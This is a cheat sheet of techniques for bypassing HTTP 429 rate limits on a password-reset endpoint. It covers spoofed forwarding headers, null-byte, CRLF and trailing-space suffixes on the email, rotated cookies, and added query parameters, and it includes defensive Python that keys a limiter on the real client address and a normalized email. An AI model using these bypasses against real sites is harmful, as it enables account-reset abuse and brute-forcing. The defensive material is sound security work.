2022-06-15 10:38:42 +00:00
# Bypass 429 (Too Many Requests)
1. Try adding custom headers
```
X-Forwarded-For: 127.0.0.1
X-Forwarded-Host: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Host: 127.0.0.1
```
For example:
```
POST /ForgotPass.php HTTP/1.1
Host: target.com
X-Forwarded-For: 127.0.0.1
...

email=victim@gmail.com
```
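The headers above only matter if the rate limiter reads them from an untrusted peer. The following added example (not code from the original page) shows the defender's side: a helper that derives the address to bucket on, honouring `X-Forwarded-For` only when the TCP peer is one of our own reverse proxies (the `10.0.0.0/8` range is an assumed value for this example) and reading the chain from the right, since everything to the left of the entry our proxy appended was supplied by the client.

```python
import ipaddress

# Constructed for this example: the only addresses allowed to set
# X-Forwarded-For are our own reverse proxies. Adjust to the real edge.
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/8")]

# Client-settable headers that carry no identity on their own. A limiter
# that reads any of these from an untrusted peer can be keyed by the client.
SPOOFABLE_HEADERS = (
    "x-forwarded-for", "x-forwarded-host", "x-client-ip",
    "x-remote-ip", "x-remote-addr", "x-host",
)


def _is_trusted(addr: str) -> bool:
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return False
    return any(ip in net for net in TRUSTED_PROXIES)


def spoofable_headers_present(headers: dict) -> list:
    """Names of client-settable identity headers in the request, for logging."""
    return [h for h in SPOOFABLE_HEADERS if h in headers]


def client_ip(remote_addr: str, headers: dict) -> str:
    """Return the address a rate limiter should bucket on.

    remote_addr is the TCP peer; headers is a dict with lowercase keys.
    X-Forwarded-For is consulted only when the peer is a trusted proxy,
    and even then the chain is read from the right, because everything
    to the left of the entry our proxy appended was supplied by the client.
    """
    if not _is_trusted(remote_addr):
        return remote_addr
    xff = headers.get("x-forwarded-for", "")
    hops = [h.strip() for h in xff.split(",") if h.strip()]
    for hop in reversed(hops):
        if _is_trusted(hop):
            continue  # another one of our proxies; keep walking left
        try:
            ipaddress.ip_address(hop)
        except ValueError:
            break  # malformed entry: fall back to the peer address
        return hop
    return remote_addr


if __name__ == "__main__":
    # Constructed request: a direct (untrusted) peer sending a spoofed header.
    hdrs = {"host": "target.com", "x-forwarded-for": "127.0.0.1"}
    print(client_ip("203.0.113.9", hdrs), spoofable_headers_present(hdrs))
```

A request arriving directly from `203.0.113.9` with `X-Forwarded-For: 127.0.0.1` is bucketed as `203.0.113.9`; the same header behind a trusted proxy that appended the real client is bucketed on that right-most untrusted hop. Logging `spoofable_headers_present` on login and password-reset routes is a cheap detection signal for the probing described in this section.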
2. Adding a null byte (`%00`) or CRLF/whitespace characters (`%09`, `%0d`, `%0a`) at the end of the email can bypass the rate limit.
```
POST /ForgotPass.php HTTP/1.1
Host: target.com
...

email=victim@gmail.com%00
```
3. Try changing the User-Agent, cookies and IP address
```
POST /ForgotPass.php HTTP/1.1
Host: target.com
Cookie: xxxxxxxxxx
...

email=victim@gmail.com
```
Try this to bypass
```
POST /ForgotPass.php HTTP/1.1
Host: target.com
Cookie: aaaaaaaaaaaaa
...

email=victim@gmail.com
```
4. Add a random query parameter at the end of the endpoint
```
POST /ForgotPass.php HTTP/1.1
Host: target.com
...

email=victim@gmail.com
```
Try this to bypass
```
POST /ForgotPass.php?random HTTP/1.1
Host: target.com
...

email=victim@gmail.com
```
5. Add a space after the parameter value
```
POST /api/forgotpass HTTP/1.1
Host: target.com
...

{"email":"victim@gmail.com"}
```
Try this to bypass
```
POST /api/forgotpass HTTP/1.1
Host: target.com
...

{"email":"victim@gmail.com "}
```
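Techniques 2 to 5 all work against the same weakness: the limiter builds its bucket key from raw, client-controlled input, so a trailing null byte, a CRLF, a throwaway query parameter, a new cookie or a trailing space each open a fresh bucket. The following added example (not code from the original page) shows a sliding-window limiter whose key is built only from the client address, the route path without its query string, and a canonicalized email (control characters removed, whitespace stripped, lowercased); cookies and User-Agent are deliberately left out of the key. The request list is constructed for this example and mirrors the variants shown above.

```python
import json
import re
import time
from collections import defaultdict, deque
from typing import Optional
from urllib.parse import parse_qs

# NUL, tab, CR, LF and every other ASCII control character.
_CONTROL_CHARS = re.compile(r"[\x00-\x1f\x7f]")


def email_from_body(body: str) -> str:
    """Extract the email field from a form-encoded or JSON body.

    parse_qs percent-decodes, so 'email=a%00' yields 'a\\x00' here; the
    cleanup happens afterwards in normalize_email.
    """
    body = body.strip()
    if body.startswith("{"):
        return str(json.loads(body).get("email", ""))
    return parse_qs(body, keep_blank_values=True).get("email", [""])[0]


def normalize_email(raw: str) -> str:
    """Canonical form used for bucketing: control characters removed,
    surrounding whitespace stripped, lowercased."""
    return _CONTROL_CHARS.sub("", raw).strip().lower()


def bucket_key(ip: str, path: str, body: str) -> str:
    # Bucket on the route only: the query string, cookies and User-Agent
    # are all chosen by the client and must not take part in the key.
    route = path.split("?", 1)[0].rstrip("/").lower() or "/"
    return f"{ip}|{route}|{normalize_email(email_from_body(body))}"


class SlidingWindowLimiter:
    def __init__(self, limit: int, window_seconds: float):
        self.limit = limit
        self.window = window_seconds
        self._hits = defaultdict(deque)  # key -> timestamps inside the window

    def allow(self, key: str, now: Optional[float] = None) -> bool:
        now = time.monotonic() if now is None else now
        q = self._hits[key]
        while q and now - q[0] >= self.window:
            q.popleft()  # drop hits that have aged out of the window
        if len(q) >= self.limit:
            return False
        q.append(now)
        return True


# Constructed requests: (client ip, request target, body, seconds since start).
# Every variant below must land in the same bucket as the first request.
SAMPLE_REQUESTS = [
    ("203.0.113.5", "/ForgotPass.php", "email=victim@gmail.com", 0.0),
    ("203.0.113.5", "/ForgotPass.php", "email=victim@gmail.com%00", 1.0),
    ("203.0.113.5", "/ForgotPass.php?random", "email=victim@gmail.com%0d%0a", 2.0),
    ("203.0.113.5", "/ForgotPass.php", "email=victim@gmail.com%20", 3.0),
    ("203.0.113.5", "/ForgotPass.php", "email=victim@gmail.com", 61.0),
]


def simulate(requests=SAMPLE_REQUESTS, limit: int = 3, window: float = 60.0) -> list:
    """Return one allow/deny decision per request, in order."""
    limiter = SlidingWindowLimiter(limit, window)
    return [limiter.allow(bucket_key(ip, path, body), t)
            for ip, path, body, t in requests]


if __name__ == "__main__":
    for (ip, path, body, t), ok in zip(SAMPLE_REQUESTS, simulate()):
        print(f"t={t:>5} {path:<22} {body!r:<36} {'allowed' if ok else 'DENIED'}")
```

With a limit of three requests per 60 seconds, the first three variants are allowed, the fourth (the trailing-space form) is denied because it resolves to the same bucket, and the plain request at 61 seconds is allowed again once the oldest hits have aged out. Pair this key with the proxy-aware client address from the earlier example so that the IP component cannot be chosen by the client either.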
## References
* [Huzaifa Tahir](https://huzaifa-tahir.medium.com/methods-to-bypass-rate-limit-5185e6c67ecd)
* [Gupta Bless](https://gupta-bless.medium.com/rate-limiting-and-its-bypassing-5146743b16be)